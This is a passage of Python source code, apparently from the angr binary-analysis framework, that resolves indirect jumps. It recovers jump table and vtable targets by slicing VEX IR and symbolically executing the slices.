bss_memory_read_bp = BP(when=BP_BEFORE, enabled=True, action=bss_hook.bss_memory_read_hook)
start_state.inspect.add_breakpoint('mem_read', bss_memory_read_bp)
# instrument specified store/put/load statements
self._instrument_statements(start_state, stmts_to_instrument, regs_to_initialize)
# FIXME:
# this is a hack: for certain architectures, we do not initialize the base pointer, since the jump table on
# those architectures may use the bp register to store values
if self.project.arch.name not in {'S390X'}:
start_state.regs.bp = start_state.arch.initial_sp + 0x2000
self._cached_memread_addrs.clear()
init_registers_on_demand_bp = BP(when=BP_BEFORE, enabled=True, action=self._init_registers_on_demand)
start_state.inspect.add_breakpoint('mem_read', init_registers_on_demand_bp)
# use Any as the concretization strategy
start_state.memory.read_strategies = [SimConcretizationStrategyAny()]
start_state.memory.write_strategies = [SimConcretizationStrategyAny()]
# Create the slicecutor
simgr = self.project.factory.simulation_manager(start_state, resilience=True)
slicecutor = Slicecutor(annotatedcfg, force_taking_exit=True)
simgr.use_technique(slicecutor)
if load_stmt is not None:
explorer = Explorer(find=load_stmt_loc[0])
elif ite_stmt is not None:
explorer = Explorer(find=ite_stmt_loc[0])
else:
raise TypeError("Unsupported type of jump table.")
simgr.use_technique(explorer)
# Run it!
try:
simgr.run()
except KeyError as ex:
# This is because the program slice is incomplete.
# Blade will support more IRExprs and IRStmts in the future
l.debug("KeyError occurred due to incomplete program slice.", exc_info=ex)
continue
# Get the jumping targets
for r in simgr.found:
if load_stmt is not None:
ret = self._try_resolve_targets_load(r, addr, cfg, annotatedcfg, load_stmt, load_size,
stmts_adding_base_addr, all_addr_holders)
if ret is None:
# Try the next state
continue
jump_table, jumptable_addr, entry_size, jumptable_size, all_targets, sort = ret
if sort == "jumptable":
ij_type = IndirectJumpType.Jumptable_AddressLoadedFromMemory
elif sort == "vtable":
ij_type = IndirectJumpType.Vtable
else:
ij_type = IndirectJumpType.Unknown
elif ite_stmt is not None:
ret = self._try_resolve_targets_ite(r, addr, cfg, annotatedcfg, ite_stmt)
if ret is None:
# Try the next state
continue
jumptable_addr = None
jump_table, jumptable_size, entry_size = ret
all_targets = jump_table
ij_type = IndirectJumpType.Jumptable_AddressComputed
else:
raise TypeError("Unsupported type of jump table.")
assert ret is not None
l.info("Resolved %d targets from %#x.", len(all_targets), addr)
# write to the IndirectJump object in CFG
ij: IndirectJump = cfg.indirect_jumps[addr]
if len(all_targets) > 1:
# It can be considered a jump table only if there are more than one jump target
if ij_type in (IndirectJumpType.Jumptable_AddressComputed, IndirectJumpType.Jumptable_AddressLoadedFromMemory):
ij.jumptable = True
else:
ij.jumptable = False
ij.jumptable_addr = jumptable_addr
ij.jumptable_size = jumptable_size
ij.jumptable_entry_size = entry_size
ij.resolved_targets = set(jump_table)
ij.jumptable_entries = jump_table
ij.type = ij_type
else:
ij.jumptable = False
ij.resolved_targets = set(jump_table)
return True, all_targets
l.info("Could not resolve indirect jump %#x in function %#x.", addr, func_addr)
return False, None
def _find_load_statement(self, b, stmt_loc):
"""
Find the location of the final Load statement that loads indirect jump targets from the jump table.
"""
# pylint:disable=no-else-continue
# shorthand
project = self.project
# initialization
load_stmt_loc, load_stmt, load_size = None, None, None
stmts_to_remove = [stmt_loc]
stmts_adding_base_addr = [] # type: list[JumpTargetBaseAddr]
# All temporary variables that hold indirect addresses loaded out of the memory
# Obviously, load_stmt.tmp must be here
# if there are additional data transferring statements between the Load statement and the base-address-adding
# statement, all_addr_holders will have more than one temporary variables
#
# Here is an example:
#
# IRSB 0x4c64c4
# + 06 | t12 = LDle:I32(t7)
# + 07 | t11 = 32Sto64(t12)
# + 10 | t2 = Add64(0x0000000000571df0,t11)
#
# all_addr_holders will be {(0x4c64c4, 11): (AddressTransferringTypes.SignedExtension, 32, 64,),
# (0x4c64c4, 12); (AddressTransferringTypes.Assignment,),
# }
all_addr_holders = OrderedDict()
while True:
preds = list(b.slice.predecessors(stmt_loc))
if len(preds) != 1:
break
block_addr, stmt_idx = stmt_loc = preds[0]
block = project.factory.block(block_addr, cross_insn_opt=True, backup_state=self.base_state).vex
if stmt_idx == DEFAULT_STATEMENT:
# it's the default exit. continue
continue
stmt = block.statements[stmt_idx]
if isinstance(stmt, (pyvex.IRStmt.WrTmp, pyvex.IRStmt.Put)):
if isinstance(stmt.data, (pyvex.IRExpr.Get, pyvex.IRExpr.RdTmp)):
# data transferring
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.Assignment,)
continue
elif isinstance(stmt.data, pyvex.IRExpr.ITE):
# data transferring
# t16 = if (t43) ILGop_Ident32(LDle(t29)) else 0x0000c844
# > t44 = ITE(t43,t16,0x0000c844)
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.Assignment,)
continue
elif isinstance(stmt.data, pyvex.IRExpr.Unop):
if stmt.data.op == 'Iop_32Sto64':
# data transferring with conversion
# t11 = 32Sto64(t12)
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.SignedExtension,
32, 64)
continue
elif stmt.data.op == 'Iop_64to32':
# data transferring with conversion
# t24 = 64to32(t21)
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.Truncation,
64, 32)
continue
elif stmt.data.op == 'Iop_32Uto64':
# data transferring with conversion
# t21 = 32Uto64(t22)
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.UnsignedExtension,
32, 64)
continue
elif stmt.data.op == 'Iop_16Uto32':
# data transferring with conversion
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.UnsignedExtension,
16, 32)
continue
elif stmt.data.op == 'Iop_8Uto32':
# data transferring with conversion
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.UnsignedExtension,
8, 32)
continue
elif isinstance(stmt.data, pyvex.IRExpr.Binop):
if stmt.data.op.startswith('Iop_Add'):
# GitHub issue #1289, an S390X binary
# jump_label = &jump_table + *(jump_table[index])
# IRSB 0x4007c0
# 00 | ------ IMark(0x4007c0, 4, 0) ------
# + 01 | t0 = GET:I32(212)
# + 02 | t1 = Add32(t0,0xffffffff)
# 03 | PUT(352) = 0x0000000000000003
# 04 | t13 = 32Sto64(t0)
# 05 | t6 = t13
# 06 | PUT(360) = t6
# 07 | PUT(368) = 0xffffffffffffffff
# 08 | PUT(376) = 0x0000000000000000
# 09 | PUT(212) = t1
# 10 | PUT(ia) = 0x00000000004007c4
# 11 | ------ IMark(0x4007c4, 6, 0) ------
# + 12 | t14 = 32Uto64(t1)
# + 13 | t8 = t14
# + 14 | t16 = CmpLE64U(t8,0x000000000000000b)
# + 15 | t15 = 1Uto32(t16)
# + 16 | t10 = t15
# + 17 | t11 = CmpNE32(t10,0x00000000)
# + 18 | if (t11) { PUT(offset=336) = 0x4007d4; Ijk_Boring }
# Next: 0x4007ca
#
# IRSB 0x4007d4
# 00 | ------ IMark(0x4007d4, 6, 0) ------
# + 01 | t8 = GET:I64(r2)
# + 02 | t7 = Shr64(t8,0x3d)
# + 03 | t9 = Shl64(t8,0x03)
# + 04 | t6 = Or64(t9,t7)
# + 05 | t11 = And64(t6,0x00000007fffffff8)
# 06 | ------ IMark(0x4007da, 6, 0) ------
# 07 | PUT(r1) = 0x0000000000400a50
# 08 | PUT(ia) = 0x00000000004007e0
# 09 | ------ IMark(0x4007e0, 6, 0) ------
# + 10 | t12 = Add64(0x0000000000400a50,t11)
# + 11 | t16 = LDbe:I64(t12)
# 12 | PUT(r2) = t16
# 13 | ------ IMark(0x4007e6, 4, 0) ------
# + 14 | t17 = Add64(0x0000000000400a50,t16)
# + Next: t17
#
# Special case: a base address is added to the loaded offset before jumping to it.
if isinstance(stmt.data.args[0], pyvex.IRExpr.Const) and \
isinstance(stmt.data.args[1], pyvex.IRExpr.RdTmp):
stmts_adding_base_addr.append(JumpTargetBaseAddr(stmt_loc, stmt,
stmt.data.args[1].tmp,
base_addr=stmt.data.args[0].con.value)
)
stmts_to_remove.append(stmt_loc)
elif isinstance(stmt.data.args[0], pyvex.IRExpr.RdTmp) and \
isinstance(stmt.data.args[1], pyvex.IRExpr.Const):
stmts_adding_base_addr.append(JumpTargetBaseAddr(stmt_loc, stmt,
stmt.data.args[0].tmp,
base_addr=stmt.data.args[1].con.value)
)
stmts_to_remove.append(stmt_loc)
elif isinstance(stmt.data.args[0], pyvex.IRExpr.RdTmp) and \
isinstance(stmt.data.args[1], pyvex.IRExpr.RdTmp):
# one of the tmps must be holding a concrete value at this point
stmts_adding_base_addr.append(JumpTargetBaseAddr(stmt_loc, stmt,
stmt.data.args[0].tmp,
tmp_1=stmt.data.args[1].tmp)
)
stmts_to_remove.append(stmt_loc)
else:
# not supported
pass
continue
elif stmt.data.op.startswith('Iop_Or'):
# this is sometimes used in VEX statements in THUMB mode code to adjust the address to an odd
# number
# e.g.
# IRSB 0x4b63
# 00 | ------ IMark(0x4b62, 4, 1) ------
# 01 | PUT(itstate) = 0x00000000
# + 02 | t11 = GET:I32(r2)
# + 03 | t10 = Shl32(t11,0x01)
# + 04 | t9 = Add32(0x00004b66,t10)
# + 05 | t8 = LDle:I16(t9)
# + 06 | t7 = 16Uto32(t8)
# + 07 | t14 = Shl32(t7,0x01)
# + 08 | t13 = Add32(0x00004b66,t14)
# + 09 | t12 = Or32(t13,0x00000001)
# + Next: t12
if isinstance(stmt.data.args[0], pyvex.IRExpr.RdTmp) and \
isinstance(stmt.data.args[1], pyvex.IRExpr.Const) and stmt.data.args[1].con.value == 1:
# great. here it is
stmts_to_remove.append(stmt_loc)
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.Or1, )
continue
elif stmt.data.op.startswith('Iop_Shl'):
# this is sometimes used when dealing with TBx instructions in ARM code.
# e.g.
# IRSB 0x4b63
# 00 | ------ IMark(0x4b62, 4, 1) ------
# 01 | PUT(itstate) = 0x00000000
# + 02 | t11 = GET:I32(r2)
# + 03 | t10 = Shl32(t11,0x01)
# + 04 | t9 = Add32(0x00004b66,t10)
# + 05 | t8 = LDle:I16(t9)
# + 06 | t7 = 16Uto32(t8)
# + 07 | t14 = Shl32(t7,0x01)
# + 08 | t13 = Add32(0x00004b66,t14)
# + 09 | t12 = Or32(t13,0x00000001)
# + Next: t12
if isinstance(stmt.data.args[0], pyvex.IRExpr.RdTmp) and \
isinstance(stmt.data.args[1], pyvex.IRExpr.Const):
# found it
stmts_to_remove.append(stmt_loc)
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.ShiftLeft,
stmt.data.args[1].con.value)
continue
elif isinstance(stmt.data, pyvex.IRExpr.Load):
# Got it!
load_stmt, load_stmt_loc, load_size = stmt, stmt_loc, \
block.tyenv.sizeof(stmt.tmp) // self.project.arch.byte_width
stmts_to_remove.append(stmt_loc)
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.Assignment, )
elif isinstance(stmt, pyvex.IRStmt.LoadG):
# Got it!
#
# this is how an ARM jump table is translated to VEX
# > t16 = if (t43) ILGop_Ident32(LDle(t29)) else 0x0000c844
load_stmt, load_stmt_loc, load_size = stmt, stmt_loc, \
block.tyenv.sizeof(stmt.dst) // self.project.arch.byte_width
stmts_to_remove.append(stmt_loc)
break
return load_stmt_loc, load_stmt, load_size, stmts_to_remove, stmts_adding_base_addr, all_addr_holders
def _find_load_pc_ite_statement(self, b: Blade, stmt_loc: Tuple[int,int]):
"""
Find the location of the final ITE statement that loads indirect jump targets into a tmp.
The slice looks like the following:
IRSB 0x41d0fc
00 | ------ IMark(0x41d0fc, 4, 0) ------
+ 01 | t0 = GET:I32(r5)
+ 02 | t2 = Sub32(t0,0x00000022)
03 | PUT(r3) = t2
04 | ------ IMark(0x41d100, 4, 0) ------
05 | PUT(cc_op) = 0x00000002
06 | PUT(cc_dep1) = t2
07 | PUT(cc_dep2) = 0x0000001c
08 | PUT(cc_ndep) = 0x00000000
09 | ------ IMark(0x41d104, 4, 0) ------
+ 10 | t25 = CmpLE32U(t2,0x0000001c)
11 | t24 = 1Uto32(t25)
+ 12 | t8 = Shl32(t2,0x02)
+ 13 | t10 = Add32(0x0041d10c,t8)
+ 14 | t26 = ITE(t25,t10,0x0041d104) <---- this is the statement that we are looking for. Note that
0x0041d104 *must* be ignored since it is a side effect generated
by the VEX ARM lifter
15 | PUT(pc) = t26
16 | t21 = Xor32(t24,0x00000001)
17 | t27 = 32to1(t21)
18 | if (t27) { PUT(offset=68) = 0x41d108; Ijk_Boring }
+ Next: t26
:param b: The Blade instance, which comes with the slice.
:param stmt_loc: The location of the final statement.
:return:
"""
project = self.project
ite_stmt, ite_stmt_loc = None, None
stmts_to_remove = [stmt_loc]
while True:
preds = list(b.slice.predecessors(stmt_loc))
if len(preds) != 1:
break
block_addr, stmt_idx = stmt_loc = preds[0]
stmts_to_remove.append(stmt_loc)
block = project.factory.block(block_addr, cross_insn_opt=True).vex
if stmt_idx == DEFAULT_STATEMENT:
# we should not reach the default exit (which belongs to a predecessor block)
break
if not isinstance(block.next, pyvex.IRExpr.RdTmp):
# next must be an RdTmp
break
stmt = block.statements[stmt_idx]
if isinstance(stmt, pyvex.IRStmt.WrTmp) and stmt.tmp == block.next.tmp and \
isinstance(stmt.data, pyvex.IRExpr.ITE):
# yes!
ite_stmt, ite_stmt_loc = stmt, stmt_loc
break
return ite_stmt, ite_stmt_loc, stmts_to_remove
def _jumptable_precheck(self, b):
"""
Perform a pre-check on the slice to determine whether it is a jump table or not. Please refer to the docstring
of JumpTableProcessor for how precheck and statement instrumentation works. A NotAJumpTableNotification
exception will be raised if the slice fails this precheck.
:param b: The statement slice generated by Blade.
:return: A list of statements to instrument, and a list of registers to initialize.
:rtype: tuple of lists
"""
# pylint:disable=no-else-continue
engine = JumpTableProcessor(self.project)
sources = [ n for n in b.slice.nodes() if b.slice.in_degree(n) == 0 ]
annotatedcfg = AnnotatedCFG(self.project, None, detect_loops=False)
annotatedcfg.from_digraph(b.slice)
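# starting from each source of the slice, abstractly execute only the whitelisted statements
# block by block until the JumpTableProcessor either classifies the slice as a jump table
# (returning what to instrument) or rejects it with NotAJumpTableNotification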
for src in sources:
state = JumpTableProcessorState(self.project.arch)
traced = { src[0] }
while src is not None:
state._tmpvar_source.clear()
block_addr, _ = src
block = self.project.factory.block(block_addr, cross_insn_opt=True, backup_state=self.base_state)
stmt_whitelist = annotatedcfg.get_whitelisted_statements(block_addr)
engine.process(state, block=block, whitelist=stmt_whitelist)
if state.is_jumptable:
return state.stmts_to_instrument, state.regs_to_initialize
if state.is_jumptable is False:
raise NotAJumpTableNotification()
# find the next block
src = None
for idx in reversed(stmt_whitelist):
loc = (block_addr, idx)
successors = list(b.slice.successors(loc))
if len(successors) == 1:
block_addr_ = successors[0][0]
if block_addr_ not in traced:
src = successors[0]
traced.add(block_addr_)
break
raise NotAJumpTableNotification()
@staticmethod
def _try_resolve_single_constant_loads(load_stmt, cfg, addr):
"""
Resolve cases where only a single constant load is required to resolve the indirect jump. Strictly speaking, it
is not a jump table, but we resolve it here anyway.
:param load_stmt: The pyvex.IRStmt.Load statement that loads an address.
:param cfg: The CFG instance.
:param int addr: Address of the jump table block.
:return: A jump target, or None if it cannot be resolved.
:rtype: int or None
"""
# If we're just reading a constant, don't bother with the rest of this mess!
if isinstance(load_stmt, pyvex.IRStmt.WrTmp):
if type(load_stmt.data.addr) is pyvex.IRExpr.Const:
# It's directly loading from a constant address
# e.g.,
# ldr r0, =main+1
# blx r0
# It's not a jump table, but we resolve it anyway
jump_target_addr = load_stmt.data.addr.con.value
jump_target = cfg._fast_memory_load_pointer(jump_target_addr)
if jump_target is None:
l.info("Constant indirect jump %#x points outside of loaded memory to %#08x", addr,
jump_target_addr)
raise NotAJumpTableNotification()
l.info("Resolved constant indirect jump from %#08x to %#08x", addr, jump_target_addr)
return jump_target
elif isinstance(load_stmt, pyvex.IRStmt.LoadG):
if type(load_stmt.addr) is pyvex.IRExpr.Const:
# It's directly loading from a constant address
# e.g.,
# 4352c SUB R1, R11, #0x1000
# 43530 LDRHI R3, =loc_45450
# ...
# 43540 MOV PC, R3
#
# It's not a jump table, but we resolve it anyway
# Note that this block has two branches: One goes to 45450, the other one goes to whatever the original
# value of R3 is. Some intensive data-flow analysis is required in this case.
jump_target_addr = load_stmt.addr.con.value
jump_target = cfg._fast_memory_load_pointer(jump_target_addr)
l.info("Resolved constant indirect jump from %#08x to %#08x", addr, jump_target_addr)
return jump_target
return None
def _try_resolve_targets_load(self, r, addr, cfg, annotatedcfg, load_stmt, load_size, stmts_adding_base_addr,
all_addr_holders):
"""
Try loading all jump targets from a jump table or a vtable.
"""
# shorthand
project = self.project
try:
whitelist = annotatedcfg.get_whitelisted_statements(r.addr)
last_stmt = annotatedcfg.get_last_statement_index(r.addr)
succ = project.factory.successors(r, whitelist=whitelist, last_stmt=last_stmt)
except (AngrError, SimError):
# oops there are errors
l.warning('Cannot get jump successor states from a path that has reached the target. Skip it.')
return None
all_states = succ.flat_successors + succ.unconstrained_successors
if not all_states:
l.warning("Slicecutor failed to execute the program slice. No output state is available.")
return None
state = all_states[0] # Just take the first state
self._cached_memread_addrs.clear() # clear the cache to save some memory (and avoid confusion when debugging)
# Parse the memory load statement and get the memory address of where the jump table is stored
jumptable_addr = self._parse_load_statement(load_stmt, state)
if jumptable_addr is None:
return None
# sanity check and necessary pre-processing
if stmts_adding_base_addr:
if len(stmts_adding_base_addr) != 1:
# We do not support the cases where the base address involves more than one addition.
# One such case exists in libc-2.27.so shipped with Ubuntu x86 where esi is used as the address of the
# data region.
#
# .text:00047316 mov eax, esi
# .text:00047318 mov esi, [ebp+data_region_ptr]
# .text:0004731E movsx eax, al
# .text:00047321 movzx eax, byte ptr [esi+eax-603A0h]
# .text:00047329 mov eax, ds:(jpt_47337 - 1D8000h)[esi+eax*4] ; switch 32 cases
# .text:00047330 lea eax, (loc_47033 - 1D8000h)[esi+eax] ; jumptable 00047337 cases 0-13,27-31
# .text:00047337 jmp eax ; switch
#
# the proper solution requires angr to correctly determine that esi is the beginning address of the data
# region (in this case, 0x1d8000). we give up in such cases until we can reasonably perform a
# full-function data propagation before performing jump table recovery.
return None
jump_base_addr = stmts_adding_base_addr[0]
if jump_base_addr.base_addr_available:
addr_holders = {(jump_base_addr.stmt_loc[0], jump_base_addr.tmp)}
else:
addr_holders = {(jump_base_addr.stmt_loc[0], jump_base_addr.tmp),
(jump_base_addr.stmt_loc[0], jump_base_addr.tmp_1)
}
if len(set(all_addr_holders.keys()).intersection(addr_holders)) != 1:
# for some reason it's trying to add a base address onto a different temporary variable that we
# are not aware of. skip.
return None
if not jump_base_addr.base_addr_available:
# we need to decide which tmp is the address holder and which tmp holds the base address
addr_holder = next(iter(set(all_addr_holders.keys()).intersection(addr_holders)))
if jump_base_addr.tmp_1 == addr_holder[1]:
# swap the two tmps
jump_base_addr.tmp, jump_base_addr.tmp_1 = jump_base_addr.tmp_1, jump_base_addr.tmp
# Load the concrete base address
jump_base_addr.base_addr = state.solver.eval(state.scratch.temps[jump_base_addr.tmp_1])
all_targets = [ ]
jumptable_addr_vsa = jumptable_addr._model_vsa
if not isinstance(jumptable_addr_vsa, claripy.vsa.StridedInterval):
return None
# we may resolve a vtable (in C, e.g., the IO_JUMPS_FUNC in libc), but the stride of this load is usually 1
# while the read statement reads a word size at a time.
# we use this to differentiate between traditional jump tables (where each entry points to a block that belongs to
# the current function) and vtables (where each entry is a function pointer).
if jumptable_addr_vsa.stride < load_size:
stride = load_size
total_cases = jumptable_addr_vsa.cardinality // load_size
sort = 'vtable' # it's probably a vtable!
else:
stride = jumptable_addr_vsa.stride
total_cases = jumptable_addr_vsa.cardinality
sort = 'jumptable'
if total_cases > self._max_targets:
# We resolved too many targets for this indirect jump. Something might have gone wrong.
l.debug("%d targets are resolved for the indirect jump at %#x. It may not be a jump table. Try the "
"next source, if there is any.",
total_cases, addr)
return None
# Or alternatively, we can ask user, which is meh...
#
# jump_base_addr = int(raw_input("please give me the jump base addr: "), 16)
# total_cases = int(raw_input("please give me the total cases: "))
# jump_target = state.solver.SI(bits=64, lower_bound=jump_base_addr, upper_bound=jump_base_addr +
# (total_cases - 1) * 8, stride=8)
jump_table = [ ]
min_jumptable_addr = state.solver.min(jumptable_addr)
max_jumptable_addr = state.solver.max(jumptable_addr)
# Both the min jump target and the max jump target should be within a mapped memory region
# i.e., we shouldn't be jumping to the stack or somewhere unmapped
if (not project.loader.find_segment_containing(min_jumptable_addr) or
not project.loader.find_segment_containing(max_jumptable_addr)):
if (not project.loader.find_section_containing(min_jumptable_addr) or
not project.loader.find_section_containing(max_jumptable_addr)):
l.debug("Jump table %#x might have jump targets outside mapped memory regions. "
"Continue to resolve it from the next data source.", addr)
return None
# Load the jump table from memory
should_skip = False
for idx, a in enumerate(range(min_jumptable_addr, max_jumptable_addr + 1, stride)):
if idx % 100 == 0 and idx != 0:
l.debug("%d targets have been resolved for the indirect jump at %#x...", idx, addr)
if idx >= total_cases:
break
target = cfg._fast_memory_load_pointer(a, size=load_size)
if target is None:
l.debug("Cannot load pointer from address %#x. Skip.", a)
should_skip = True
break
all_targets.append(target)
if should_skip:
return None
# Adjust entries inside the jump table
if stmts_adding_base_addr:
stmt_adding_base_addr = stmts_adding_base_addr[0]
base_addr = stmt_adding_base_addr.base_addr
conversions = list(reversed(list(v for v in all_addr_holders.values()
if v[0] is not AddressTransferringTypes.Assignment)))
if conversions:
invert_conversion_ops = []
for conv in conversions:
if len(conv) == 1:
conversion_op, args = conv[0], None
else:
conversion_op, args = conv[0], conv[1:]
if conversion_op is AddressTransferringTypes.SignedExtension:
if args == (32, 64):
lam = lambda a: (a | 0xffffffff00000000) if a >= 0x80000000 else a
else:
raise NotImplementedError("Unsupported signed extension operation.")
elif conversion_op is AddressTransferringTypes.UnsignedExtension:
lam = lambda a: a
elif conversion_op is AddressTransferringTypes.Truncation:
if args == (64, 32):
lam = lambda a: a & 0xffffffff
else:
raise NotImplementedError("Unsupported truncation operation.")
elif conversion_op is AddressTransferringTypes.Or1:
lam = lambda a: a | 1
elif conversion_op is AddressTransferringTypes.ShiftLeft:
shift_amount = args[0]
lam = lambda a, sl=shift_amount: a << sl
else:
raise NotImplementedError("Unsupported conversion operation.")
invert_conversion_ops.append(lam)
all_targets_copy = all_targets
all_targets = []
for target_ in all_targets_copy:
for lam in invert_conversion_ops:
target_ = lam(target_)
all_targets.append(target_)
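# rebase every entry (after undoing the recorded conversions) onto the concrete base address,
# wrapping at the architecture's pointer width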
mask = (2 ** self.project.arch.bits) - 1
all_targets = [(target + base_addr) & mask for target in all_targets]
# special case for ARM: if the source block is in THUMB mode, all jump targets should be in THUMB mode, too
if is_arm_arch(self.project.arch) and (addr & 1) == 1:
all_targets = [ target | 1 for target in all_targets ]
# Finally... all targets are ready
illegal_target_found = False
for target in all_targets:
# if the total number of targets is suspicious (it usually implies a failure in applying the
# constraints), check if all jump targets are legal
if len(all_targets) in {1, 0x100, 0x10000} and not self._is_jumptarget_legal(target):
l.info("Jump target %#x is probably illegal. Try to resolve indirect jump at %#x from the next source.",
target, addr)
illegal_target_found = True
break
jump_table.append(target)
if illegal_target_found:
return None
return jump_table, min_jumptable_addr, load_size, total_cases * load_size, all_targets, sort
def _try_resolve_targets_ite(self, r, addr, cfg, annotatedcfg, ite_stmt: pyvex.IRStmt.WrTmp): # pylint:disable=unused-argument
"""
Try loading all jump targets by parsing an ITE block.
"""
project = self.project
try:
whitelist = annotatedcfg.get_whitelisted_statements(r.addr)
last_stmt = annotatedcfg.get_last_statement_index(r.addr)
succ = project.factory.successors(r, whitelist=whitelist, last_stmt=last_stmt)
except (AngrError, SimError):
# oops there are errors
l.warning('Cannot get jump successor states from a path that has reached the target. Skip it.')
return None
all_states = succ.flat_successors + succ.unconstrained_successors
if not all_states:
l.warning("Slicecutor failed to execute the program slice. No output state is available.")
return None
state = all_states[0] # Just take the first state
temps = state.scratch.temps
if not isinstance(ite_stmt.data, pyvex.IRExpr.ITE):
return None
# load the default
if not isinstance(ite_stmt.data.iffalse, pyvex.IRExpr.Const):
return None
# ite_stmt.data.iffalse.con.value is garbage introduced by the VEX ARM lifter and should be ignored
if not isinstance(ite_stmt.data.iftrue, pyvex.IRExpr.RdTmp):
return None
if not isinstance(ite_stmt.data.cond, pyvex.IRExpr.RdTmp):
return None
cond = temps[ite_stmt.data.cond.tmp]
# apply the constraint
state.add_constraints(cond == 1)
# load the target
target_expr = temps[ite_stmt.data.iftrue.tmp]
jump_table = state.solver.eval_upto(target_expr, self._max_targets + 1)
entry_size = len(target_expr) // self.project.arch.byte_width
if len(jump_table) == self._max_targets + 1:
# so many targets! failed
return None
return jump_table, len(jump_table), entry_size
@staticmethod
def _instrument_statements(state, stmts_to_instrument, regs_to_initialize):
"""
Hook statements as specified in stmts_to_instrument and overwrite values loaded in those statements.
:param SimState state: The program state to insert hooks to.
:param list stmts_to_instrument: A list of statements to instrument.
:param list regs_to_initialize: A list of registers to initialize.
:return: None
"""
for sort, block_addr, stmt_idx in stmts_to_instrument:
l.debug("Add a %s hook to overwrite memory/register values at %#x:%d.", sort, block_addr, stmt_idx)
if sort == 'mem_write':
bp = BP(when=BP_BEFORE, enabled=True, action=StoreHook.hook,
condition=lambda _s, a=block_addr, idx=stmt_idx:
_s.scratch.bbl_addr == a and _s.scratch.stmt_idx == idx
)
state.inspect.add_breakpoint('mem_write', bp)
elif sort == 'mem_read':
hook = LoadHook()
bp0 = BP(when=BP_BEFORE, enabled=True, action=hook.hook_before,
condition=lambda _s, a=block_addr, idx=stmt_idx:
_s.scratch.bbl_addr == a and _s.scratch.stmt_idx == idx
)
state.inspect.add_breakpoint('mem_read', bp0)
bp1 = BP(when=BP_AFTER, enabled=True, action=hook.hook_after,
condition=lambda _s, a=block_addr, idx=stmt_idx:
_s.scratch.bbl_addr == a and _s.scratch.stmt_idx == idx
)
state.inspect.add_breakpoint('mem_read', bp1)
elif sort == 'reg_write':
bp = BP(when=BP_BEFORE, enabled=True, action=PutHook.hook,
condition=lambda _s, a=block_addr, idx=stmt_idx:
_s.scratch.bbl_addr == a and _s.scratch.stmt_idx == idx
)
state.inspect.add_breakpoint('reg_write', bp)
else:
raise NotImplementedError("Unsupported sort %s in stmts_to_instrument." % sort)
reg_val = 0x13370000
for block_addr, stmt_idx, reg_offset, reg_bits in regs_to_initialize:
l.debug("Add a hook to initialize register %s at %x:%d.",
state.arch.translate_register_name(reg_offset, size=reg_bits),
block_addr, stmt_idx)
bp = BP(when=BP_BEFORE, enabled=True, action=RegisterInitializerHook(reg_offset, reg_bits, reg_val).hook,
condition=lambda _s, a=block_addr, idx=stmt_idx: _s.scratch.bbl_addr == a and _s.inspect.statement == idx
)
state.inspect.add_breakpoint('statement', bp)
reg_val += 16
def _find_bss_region(self):
self._bss_regions = [ ]
# TODO: support other sections other than '.bss'.
# TODO: this is very hackish. fix it after the chaos.
for section in self.project.loader.main_object.sections:
if section.name == '.bss':
self._bss_regions.append((section.vaddr, section.memsize))
break
def _init_registers_on_demand(self, state):
# for an uninitialized read whose source address comes from a register, we replace the address with a fresh concrete value on demand
read_addr = state.inspect.mem_read_address
cond = state.inspect.mem_read_condition
if not isinstance(read_addr, int) and read_addr.uninitialized and cond is None:
# if this AST has been initialized before, just use the cached addr
cached_addr = self._cached_memread_addrs.get(read_addr, None)
if cached_addr is not None:
state.inspect.mem_read_address = cached_addr
return
read_length = state.inspect.mem_read_length
if not isinstance(read_length, int):
read_length = read_length._model_vsa.upper_bound
if read_length > 16:
return
new_read_addr = state.solver.BVV(UninitReadMeta.uninit_read_base, state.arch.bits)
UninitReadMeta.uninit_read_base += read_length
# replace the expression in registers
state.registers.replace_all(read_addr, new_read_addr)
# extra caution: if this read_addr AST comes up again in the future, we want to replace it with the same
# address again.
self._cached_memread_addrs[read_addr] = new_read_addr
state.inspect.mem_read_address = new_read_addr
# job done :-)
def _dbg_repr_slice(self, blade, in_slice_stmts_only=False):
stmts = defaultdict(set)
for addr, stmt_idx in sorted(list(blade.slice.nodes())):
stmts[addr].add(stmt_idx)
for addr in sorted(stmts.keys()):
stmt_ids = stmts[addr]
irsb = self.project.factory.block(addr, cross_insn_opt=True, backup_state=self.base_state).vex
print(" ####")
print(" #### Block %#x" % addr)
print(" ####")
for i, stmt in enumerate(irsb.statements):
stmt_taken = i in stmt_ids
display = stmt_taken if in_slice_stmts_only else True
if display:
s = "%s %x:%02d | " % ("+" if stmt_taken else " ", addr, i)
s += "%s " % stmt.__str__(arch=self.project.arch, tyenv=irsb.tyenv)
if stmt_taken:
s += "IN: %d" % blade.slice.in_degree((addr, i))
print(s)
# the default exit
default_exit_taken = DEFAULT_STATEMENT in stmt_ids
s = "%s %x:default | PUT(%s) = %s; %s" % ("+" if default_exit_taken else " ", addr, irsb.offsIP, irsb.next,
irsb.jumpkind
)
print(s)
def _initial_state(self, src_irsb):
state = self.project.factory.blank_state(
addr=src_irsb,
mode='static',
add_options={
o.DO_RET_EMULATION,
o.TRUE_RET_EMULATION_GUARD,
o.AVOID_MULTIVALUED_READS,
},
remove_options={
